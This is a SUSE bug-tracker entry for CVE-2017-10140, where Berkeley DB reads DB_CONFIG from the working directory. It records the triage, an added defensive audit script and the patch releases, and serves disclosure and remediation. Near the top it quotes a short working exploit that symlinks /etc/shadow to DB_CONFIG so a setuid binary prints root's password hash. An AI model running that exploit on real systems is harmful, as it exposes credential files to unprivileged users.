Bug 1043886 - (CVE-2017-10140) VUL-0: CVE-2017-10140: libdb-4_5,libdb-4_8: Berkeley DB reads DB_CONFIG from cwd
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium, Severity: Normal
Assigned To: Security Team bot
https://smash.suse.de/issue/186593/
CVSSv3:SUSE:CVE-2017-10140:5.1:(AV:L/...
Reported: 2017-06-12 14:39 UTC by Johannes Segitz
Modified: 2018-02-22 11:09 UTC

Found By: Security Response Team
Description Johannes Segitz 2017-06-12 14:39:22 UTC
OSS:2017/Q2/452
From: Jakub Wilk

Apparently Berkeley DB reads the DB_CONFIG configuration file from the current working directory by default[*]. This is surprising and AFAICT undocumented.

Here's how to exploit it against pam_ccreds:

   $ cat /etc/shadow
   cat: /etc/shadow: Permission denied
   $ ln -sf /etc/shadow DB_CONFIG
   $ /sbin/ccreds_chkpwd moo < /dev/null
   BDB1584 line 1: root:$1$QRCEVRMX$sPppjXE42AZnUPuEWf87D.:17327:0:99999:7:::: incorrect name-value pair


References:
http://seclists.org/oss-sec/2017/q2/452
Comment 1 Johannes Segitz 2017-06-12 14:40:14 UTC
So this needs a suitable vector to be a problem, but it's a pretty common component, so that's probably not hard to find.
Comment 2 Pedro Monreal Gonzalez 2017-06-21 15:12:01 UTC
It seems we are not affected by this exploit since we are not shipping /sbin/ccreds_chkpwd. The source of this program comes with the package pam_ccreds but it is not installed (maybe because it requires the setuid attribute). Note that the exploit works only in distributions which install ccreds_chkpwd.
Comment 4 Reinhard Max 2017-06-21 15:26:59 UTC
AFAIU /sbin/ccreds_chkpwd is only used as an example for a suid root program that is linked against libdb. But the actual bug is in libdb and thus every suid root binary that uses libdb could be used to exploit it.
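
An added example, not part of the bug report or of any SUSE tooling: one way to inventory the exposure comment 4 describes, by listing setuid/setgid ELF files that link libdb directly so they can be prioritized for the update. The function names and the soname pattern are assumptions.

```shell
#!/bin/sh
# Added example: list setuid/setgid ELF files that link libdb directly.
# Uses `readelf -d` (static inspection) instead of ldd, which may run
# code from the file being inspected.

# Read `readelf -d` output on stdin; succeed if a NEEDED entry names a
# Berkeley DB library. The pattern is an assumption covering sonames
# such as libdb-4.8.so and libdb_cxx-5.3.so; it must not match
# unrelated libraries such as libdbus-1.so.3.
needs_libdb() {
    grep -Eq '\(NEEDED\).*\[libdb(_[a-z]+)?-[0-9]+\.[0-9]+\.so'
}

# Print every setuid or setgid regular file under $1 that needs libdb.
# Only direct dependencies are seen: libdb pulled in through another
# shared library or a dlopen()ed module (PAM, NSS) needs its own check.
audit_tree() {
    find "$1" -xdev -type f -perm /6000 2>/dev/null |
    while IFS= read -r f; do
        if readelf -d "$f" 2>/dev/null | needs_libdb; then
            printf '%s\n' "$f"
        fi
    done
}

# Constructed sample of `readelf -d` output, for trying the parser offline.
sample_dynamic_section() {
    cat <<'EOF'
 0x0000000000000001 (NEEDED)   Shared library: [libpam.so.0]
 0x0000000000000001 (NEEDED)   Shared library: [libdb-4.8.so]
 0x0000000000000001 (NEEDED)   Shared library: [libc.so.6]
EOF
}

# Usage (as root, so unreadable files are not skipped):
#   audit_tree /
```

A hit means the binary loads libdb and should be checked against the fixed package versions listed in the update notices on this page.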
Comment 6 Pedro Monreal Gonzalez 2017-06-21 15:48:58 UTC
The patch mentioned in http://seclists.org/oss-sec/2017/q2/479 seems to fix the problem but it might break other things. I'll try to dig more.
Comment 7 Johannes Segitz 2017-06-22 06:08:29 UTC
(In reply to Reinhard Max from comment #4)
yes, that is correct
Comment 12 Swamp Workflow Management 2018-02-09 17:09:23 UTC
SUSE-SU-2018:0409-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
SUSE Studio Onsite 1.3 (src):    libdb-4_5-4.5.20-97.5
SUSE Linux Enterprise Software Development Kit 11-SP4 (src):    libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7
SUSE Linux Enterprise Server 11-SP4 (src):    libdb-4_5-4.5.20-97.5
SUSE Linux Enterprise Debuginfo 11-SP4 (src):    libdb-4_5-4.5.20-97.5, libdb_java-4_5-4.5.20-97.7
Comment 13 Swamp Workflow Management 2018-02-21 17:19:36 UTC
SUSE-SU-2018:0510-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP3 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server 12-SP3 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Server 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Desktop 12-SP3 (src):    libdb-4_8-4.8.30-29.6
SUSE Linux Enterprise Desktop 12-SP2 (src):    libdb-4_8-4.8.30-29.6
SUSE CaaS Platform ALL (src):    libdb-4_8-4.8.30-29.6
OpenStack Cloud Magnum Orchestration 7 (src):    libdb-4_8-4.8.30-29.6
Comment 14 Andreas Stieger 2018-02-21 19:18:54 UTC
You forgot openSUSE:Leap:42.3:Update/libdb-4_5
Comment 15 Andreas Stieger 2018-02-21 19:26:58 UTC
submitted missing to Leap 42.3. Asked for it to be dropped from the SLE 15 codestream and not be included in Leap 15.0
Comment 16 Swamp Workflow Management 2018-02-21 21:40:08 UTC
This is an autogenerated message for OBS integration:
This bug (1043886) was mentioned in
https://build.opensuse.org/request/show/578815 42.3 / libdb-4_5
Comment 17 Andreas Stieger 2018-02-22 07:33:27 UTC
releasing for Leap, done
Comment 18 Swamp Workflow Management 2018-02-22 11:08:51 UTC
openSUSE-SU-2018:0519-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
openSUSE Leap 42.3 (src):    libdb-4_5-4.5.20-135.3.1, libdb_java-4_5-4.5.20-135.3.1
Comment 19 Swamp Workflow Management 2018-02-22 11:09:12 UTC
openSUSE-SU-2018:0520-1: An update that contains security fixes can now be installed.

Category: security (moderate)
Bug References: 1043886
CVE References: 
Sources used:
openSUSE Leap 42.3 (src):    libdb-4_8-4.8.30-34.3.1, libdb_java-4_8-4.8.30-34.3.1